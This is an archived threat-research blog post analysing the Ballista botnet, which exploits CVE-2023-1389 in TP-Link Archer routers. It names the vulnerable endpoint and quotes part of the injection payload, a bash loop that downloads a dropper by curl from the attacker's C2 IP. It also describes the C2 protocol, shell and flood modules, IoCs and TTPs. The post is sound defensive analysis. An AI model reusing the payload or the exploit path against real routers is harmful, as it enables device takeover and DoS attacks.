{
	"id": "91acab3d-c89b-4d3c-8648-5ab463f1d3ac",
	"created_at": "2026-04-06T01:31:07.46977Z",
	"updated_at": "2026-04-10T13:12:27.863346Z",
	"deleted_at": null,
	"sha1_hash": "1f46723dca26b3154f3d5de63641f1f60f1af8f5",
	"title": "Cato CTRL Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 118891,
	"plain_text": "Cato CTRL Threat Research: Ballista – New IoT Botnet Targeting\r\nThousands of TP-Link Archer Routers\r\nBy Matan Mittelman, Ofek Vardi\r\nPublished: 2025-03-11 · Archived: 2026-04-06 01:21:20 UTC\r\nListen to post:\r\nExecutive Summary\r\nOver the years, major IoT botnets like Mirai and Mozi have proven how easily routers can be exploited and threat\r\nactors have taken note. Two key issues have played in their favor: the fact that users rarely deploy new firmware\r\nto their routers, coupled with the lack of regard for security by router vendors. As a result, router vulnerabilities\r\nmay persist in the wild for much longer than initially expected, even after patches are published publicly.\r\nSince the start of 2025, Cato CTRL has been collecting data on exploitation attempts of IoT devices and malware\r\ndeployed through these attempts. During our analysis, a previously unreported global IoT botnet campaign\r\ntargeting TP-Link Archer routers has emerged. The botnet exploits a remote code execution (RCE) vulnerability in\r\nTP-Link Archer routers (CVE-2023-1389) to spread itself automatically over the Internet. Specifically, the AX21\r\nmodel (aka AX1800 model; a firmware update can be found here) to spread itself automatically over the\r\nInternet. TP-Link products have made headlines recently, as The Wall Street Journal reported in December 2024\r\nthat U.S. government agencies have considered banning TP-Link devices due to security concerns linked to China.\r\nCato CTRL first identified this campaign on January 10. Over the course of a few weeks, several initial-access\r\nattempts were detected, with the most recent attempt taking place on February 17. The Initial payload includes a\r\nmalware dropper (specifically, a bash script) that downloads the malware. 
During our analysis, we observed the botnet evolving by switching to the use of Tor domains to become stealthier—possibly prompted by our investigation into this campaign.\r\nOnce executed, the malware sets up a TLS encrypted command and control (C2) channel on port 82, which is used to fully control the compromised device. This allows running shell commands to conduct further RCE and denial of service (DoS) attacks. In addition, the malware attempts to read sensitive files on the local system.\r\nCato CTRL assesses with moderate confidence that this campaign is linked to an Italian-based threat actor, based on the IP address location (2.237.57[.]70) of the C2 server and supported by Italian strings found within the malware binaries. Due to the Italian links, and the targeted TP-Link Archer routers, we have named the botnet “Ballista” as a reference to the ancient Roman weapon.\r\nThe Ballista botnet has targeted manufacturing, medical/healthcare, services, and technology organizations in the U.S., Australia, China, and Mexico. Using a Censys search, we’ve identified more than 6,000 vulnerable devices connected to the Internet at the time of writing. We believe the botnet is still active. The analysis below outlines the inner workings of the malware, its C2 protocol, discovery techniques, and DoS capabilities.\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 1 of 9\n\nTechnical Overview\r\nDropper Analysis\r\nAs part of its initial access vector, the Ballista botnet exploits CVE-2023-1389. This vulnerability in the TP-Link Archer router’s web management interface (T1190) stems from the lack of sanitization of user input in the country form of the /cgi-bin/luci;stok=/locale endpoint, resulting in unauthenticated command execution (T1059.004) with root privileges.\r\nThe botnet exploits this vulnerability by injecting a payload that downloads and executes a cleartext shell dropper named dropbpb.sh, responsible for downloading the malware binaries and executing them on the compromised device.\r\nThe URL-decoded payload used to install the dropper can be seen below:\r\n$(echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / \u0026\u0026 dbp=\"dropbpb.sh\"; while true; do r=$(curl http\r\nThis bash one-liner runs a while loop that attempts to download the dropper from an attacker-controlled server (2.237.57[.]70) on port 81 (T1571), via HTTP (T1071.001), and writes it onto disk. 
Next, it gives it full permissions (T1222.002) and executes it as a background process.\r\nUpon execution, the dropper removes itself from disk (T1070.004) and attempts to move to other directories on the local system (T1083, T1070.010), where it will download and execute the malware.\r\nEventually, the script drops five pre-compiled binaries onto the target system (T1105) named bpb.$arch, corresponding to the following system architectures: mips, mipsel, armv5l, armv7l, x86_64, using the curl command or wget as a fallback. This behavior is common amongst malware droppers. One thing to note here: the dropper is behaving in a “noisy” manner by attempting to download and execute all the different binaries, rather than checking for the compromised architecture and downloading the corresponding binary. Both of these approaches have been observed in other droppers throughout our research into IoT malware.\r\nFor example, we observed RedTail cryptominer droppers using the uname -mp command to find the hardware platform type and processor architecture.\r\nFigure 1. Dropper code used to download the malware binaries\r\nMalware Capabilities (High-Level)\r\nThe default malware execution flow displays the following capabilities:\r\n1. Kills previous instances of itself (T1057) and removes itself from disk upon execution (T1070.004) to avoid detection.\r\n2. Reads numerous configuration files on the system (T1005, TA0007).\r\n3. Sets up an encrypted C2 channel on port 82 (T1573, T1095), through which additional functionality can be invoked.\r\n4. 
Spreads to other devices on the Internet automatically by attempting to exploit CVE-2023-1389 (T1190, T1059.004).\r\nUpon receiving certain commands from the C2 server, the malware can also employ additional capabilities:\r\n1. Run shell commands on the compromised device (T1059.004).\r\n2. Start a DoS/DDoS attack (T1499).\r\nMalware Capabilities (Deep-Dive)\r\nIn this section, we’ll go over the malware’s capabilities mentioned above, elaborate on the different modules employed by this malware, and analyze how each module helps achieve different objectives.\r\nIn order to handle the different modules, the malware maintains a module queue, which holds modules requested by the C2 server. In addition, it starts a background thread which continuously checks the queue for new modules and triggers them in new threads.\r\nThe following model illustrates how the malware operates.\r\nFigure 2. Malware execution flow\r\nMain Thread\r\nAs seen in the above illustration, the main thread starts by killing previous instances of the malware and removing its binaries from disk. This behavior is reflected in the standard output.\r\nFigure 3. Malware standard output (part 1)\r\nTaking a deeper look into the assembly code reveals the use of multiple ps commands to list running processes before killing the ones associated with the malware binaries using the SIGTERM signal of the sys_kill syscall.\r\nFigure 4. Using ps commands to list \u0026 kill previous instances (malware assembly code)\r\nWe can also see the command used to remove the malware files from disk.\r\nFigure 5. 
Using rm commands to remove binaries from disk (malware assembly code)\r\nThis behavior is common amongst IoT malware, as removing its footprint and reducing noise help avoid detection.\r\nReading Sensitive Files\r\nIn addition, we observed attempts by the malware to read many sensitive files on the local system, which is reflected in its strings and syscalls. Some of the files being accessed:\r\nConfig and environment related files, such as: /etc/hosts, /etc/resolv.conf, /etc/nsswitch.conf\r\nUser and authentication related files and directories, such as: /etc/passwd, /etc/shadow, /etc/sudoers, /etc/pam.d/\r\nSSL related files: /etc/ssl/openssl.conf, /etc/security/limits.conf\r\nWhile we haven’t identified any particular use for these files, it is still important to note that threat actors can potentially use this data for multiple malicious activities, such as: exfiltration, blocking access by modifying environment configuration, creating backdoors, moving laterally, etc.\r\nC2 Setup\r\nAfter these steps are concluded, the malware prints the operating system (OS) architecture and starts setting up a C2 channel.\r\nFigure 6. Malware standard output (part 2)\r\nAnalyzing the network traffic reveals this C2 channel leads to the same attacker-controlled IP from which the malware was downloaded (2.237.57[.]70), on port 82.\r\nLooking into the assembly code reveals the use of the pthread_create() function to start a new thread for the C2 setup. Analyzing the function being called in that new thread reveals the C2 is established over transport layer security (TLS). The first packet being sent after the handshake includes the hiimrealinfected string, an indicator of compromise (IoC) unique to this malware. The second packet being sent includes the client_info_architecture x86_64 string. 
These two strings are the only data being sent by the client by default.\r\nFigure 7. First packet data sent by the client over the C2 channel (malware assembly code)\r\nExploiter Module\r\nSimultaneously, the EXPLOITER module, responsible for spreading the malware over the Internet, is added to the queue. Before each iteration, the malware hangs for five minutes by invoking the sys_nanosleep syscall, a behavior common amongst malware for detection evasion.\r\nThe exploitation attempts for CVE-2023-1389 being sent by the EXPLOITER module over HTTP to port 8080 use the same payload we’ve analyzed at the beginning of this blog.\r\nThis process is also reflected in the standard output.\r\nFigure 8. Malware standard output (part 3)\r\nThis concludes the default malware execution flow, but further analysis of the assembly code revealed the malware takes certain actions based on keywords found in commands received from the C2 channel. If a new module is requested, the malware adds it to the queue (like the FLOODER module as portrayed in the above illustration).\r\nC2 Commands\r\nLooking into the function responsible for parsing the C2 commands revealed the following keywords:\r\nflooder: Keyword to start the FLOODER module.\r\nexploiter: Keyword to start the EXPLOITER module.\r\nstart: Optional parameter to be used with the exploiter keyword to start the module. 
If absent, the KILLALL module is triggered instead.\r\nclose: Keyword to stop the module triggering function.\r\nshell: Keyword to run a Linux shell command on the local system.\r\nkillall: Keyword to start the KILLALL module.\r\nThe two most notable keywords here are shell and flooder, which we’ll explain in the next section.\r\nShell Module\r\nThe shell keyword is expected to be followed by a bash command used as a parameter for invoking sys_execve. This is a basic backdoor capability which allows for any number of post-exploitation activities, such as data exfiltration, persistence, lateral movement, etc.\r\nFigure 9. Shell module implementation (malware assembly code)\r\nFlooder Module\r\nThe flooder keyword is expected to be followed by seven parameters. These parameters are printed one by one, then processed by the flooder module after it is triggered from the queue.\r\nAnalyzing the flooder module reveals new threads continuously being invoked in a loop, using the pthread_create function call. The arguments for this call are computed from the parameters received from the C2.\r\nWhile it seems that the malware is built in a modular fashion which allows for multiple flood attack types, only one implementation has been identified. This attack is triggered by the keyword tcpgeneric, found in a memory address computed from the C2 command parameters.\r\nThe flooder keyword and its parameters are sent over a RAW socket. The module’s data is dynamically computed from the received parameters, which are encrypted; thus, we’re unable to analyze it further.\r\nFigure 10. 
Flooder module raw socket creation (malware assembly code)\r\nAttribution\r\nCato CTRL has identified an individual threat actor linked to the Ballista botnet. We assess the threat actor is Italian-based. This assessment is made with moderate confidence based on the IP address location (2.237.57[.]70) of the C2 server and supported by Italian strings found within the malware binaries.\r\nAs of this writing, we’ve noticed this IP is no longer responding and have found a new variant of the malware dropper on GitHub, using Tor domains instead of the hard-coded IP. This suggests an increase in the sophistication level of the campaign by the threat actor. While this malware sample shares similarities with other botnets, it remains distinct from widely used botnets such as Mirai and Mozi.\r\nConclusion\r\nIoT devices have been constantly targeted by threat actors for multiple reasons:\r\nThey are often connected to the Internet and come with web interfaces which use default/weak credentials, allowing for an easy initial access vector.\r\nThey are usually not well-maintained, lack robust security, contain numerous vulnerabilities, and take time to receive security patches. Combined with the fact that the update process for these devices often lacks automated patching mechanisms and may require manual firmware installations, protecting them is cumbersome and difficult.\r\nProactive identification and management of IoT devices within an organization’s network remain essential for mitigating risk and ensuring the resilience of critical infrastructure.\r\nProtections\r\nThe Cato SASE Cloud Platform safeguards organizations from the Ballista botnet and similar threats by leveraging a multi-layered security approach:\r\nCato IPS provides both tailored and generic protections for blocking CVE-2023-1389. 
In addition, it provides behavioral detections for malware activity, such as lateral movement and C2 communication, protecting all Cato-connected edges (sites, remote users, and cloud resources).\r\nCato IoT/OT Security provides device identification, which enables administrators to implement tailored policies for devices on their network, enhancing an organization’s security posture across its weak points.\r\nIndicators of Compromise (IoCs)\r\nIndicator of Compromise | Description | Relevant Links\r\n2.237.57[.]70 | Attacker C2 IP | VirusTotal\r\naccede01b73348e0d2dc306f024f7c979758892f66fb2a550f4f1089d92549f4 | Dropper Hash | VirusTotal\r\nfca22a82fa3f51b40ef0cffd8752b25f876f162061c342097cf4d93531ff1221 | x86_64 Binary Hash | VirusTotal\r\nab5e045a74fa46aabef10a1473eba51c6166638e807aa7e3abeb701463975697 | mipsel Binary Hash | VirusTotal\r\n72ef87125a1818dd20ce616cab622a7614fcb5cfcf9146465c8280a89f2c85f0 | mips Binary Hash | VirusTotal\r\n3582fb08532a5a5c715a65787c30c89f90449fb014c04ede9c488eb010c52d02 | armv7l Binary Hash | VirusTotal\r\nd7723361ca455d8a1a9714ea4b80013f77b764cb721ad151a310e23e3b4610a8 | armv5l Binary Hash | VirusTotal\r\nf1a4c0bc9fc227071e443706d28ee6deea2ebcbb7a06b7e4055644ba0cde7cfb | New Dropper Variant Hash | VirusTotal\r\nhiimrealinfected | C2 Client 1st Packet Data\r\nclient_info_architecture x86_64 | C2 Client 2nd Packet Data\r\nnpxXoudifFeEgGaACScs | Malware Binary Unique String\r\nTTPs\r\nTactic | Technique | Indicator\r\nInitial Access (TA0001) | Exploit Public-Facing Application (T1190) | The malware exploits a vulnerability in the router’s web management interface\r\nExecution (TA0002) | Command and Scripting 
Interpreter: Unix Shell (T1059.004) | The malware \u0026 dropper are installed and executed using a bash script; the malware allows for on-demand shell command execution\r\nDefense Evasion (TA0005) | File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification (T1222.002) | The attacker changes the permissions of dropped scripts using the chmod command\r\nDefense Evasion (TA0005) | Indicator Removal: File Deletion (T1070.004) | The malware removes itself and the dropper from disk using the rm command\r\nDefense Evasion (TA0005) | Indicator Removal: Relocate Malware (T1070.010) | The dropper relocates before downloading the malware binaries\r\nDefense Evasion (TA0005) | Obfuscated Files or Information: Binary Padding (T1027.001) | Repeated no-op instructions were observed during reverse engineering analysis\r\nDefense Evasion (TA0005) | Obfuscated Files or Information: Stripped Payloads (T1027.008) | The malware binaries are stripped \u0026 statically linked\r\nDefense Evasion (TA0005) | Obfuscated Files or Information: Command Obfuscation (T1027.010) | The payload used for CVE-2023-1389 is URL-encoded; the malware includes base64 related strings\r\nCredential Access (TA0006) | Credentials from Password Stores (T1555) | The malware reads multiple files storing user credentials\r\nCredential Access (TA0006) | OS Credential Dumping: /etc/passwd and /etc/shadow (T1003.008) | The malware reads the /etc/passwd \u0026 /etc/shadow files\r\nDiscovery (TA0007) | File and Directory Discovery (T1083) | The dropper searches for directories with specific permissions using the find command\r\nDiscovery (TA0007) | Password Policy Discovery (T1201) | The malware reads files at /etc/pam.d/\r\nDiscovery (TA0007) | Process Discovery (T1057) | The malware lists processes using the ps command\r\nDiscovery (TA0007) | System Information Discovery (T1082) | The malware sends the OS architecture to the C2\r\nDiscovery (TA0007) | System Network 
Configuration Discovery (T1016) | The malware reads /etc/hosts \u0026 other network configuration related files\r\nDiscovery (TA0007) | System Network Configuration Discovery: Internet Connection Discovery (T1016.001) | The malware sends GET requests to check connectivity before attempting to exploit CVE-2023-1389\r\nCollection (TA0009) | Data from Local System (T1005) | The malware reads multiple files related to system \u0026 network configuration, user data, package management \u0026 more\r\nCommand and Control (TA0011) | Non-Application Layer Protocol (T1095) | The malware C2 sends data over TLS using a custom protocol\r\nCommand and Control (TA0011) | Non-Standard Port (T1571) | The malware C2 is using ports 81 \u0026 82 to download binaries \u0026 communicate respectively\r\nCommand and Control (TA0011) | Encrypted Channel: Symmetric Cryptography (T1573.001) | The malware C2 channel is TLS encrypted\r\nCommand and Control (TA0011) | Encrypted Channel: Asymmetric Cryptography (T1573.002) | The malware C2 channel is TLS encrypted; the malware includes strings related to private \u0026 public encryption keys\r\nCommand and Control (TA0011) | Ingress Tool Transfer (T1105) | The dropper \u0026 malware binaries are downloaded from the C2 server using curl / wget\r\nCommand and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | The dropper \u0026 malware binaries are downloaded from the C2 server over HTTP using curl / wget\r\nCommand and Control (TA0011) | Proxy: Multi-hop Proxy (T1090.003) | A new variant of the dropper was observed using .onion TOR domains\r\nCommand and Control (TA0011) | Hide Infrastructure (T1665) | A new variant of the dropper was observed using .onion TOR domains\r\nSource: https://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/"
	],
	"report_names": [
		"cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers"
	],
	"threat_actors": [],
	"ts_created_at": 1775439067,
	"ts_updated_at": 1775826747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1f46723dca26b3154f3d5de63641f1f60f1af8f5.pdf",
		"text": "https://archive.orkl.eu/1f46723dca26b3154f3d5de63641f1f60f1af8f5.txt",
		"img": "https://archive.orkl.eu/1f46723dca26b3154f3d5de63641f1f60f1af8f5.jpg"
	}
}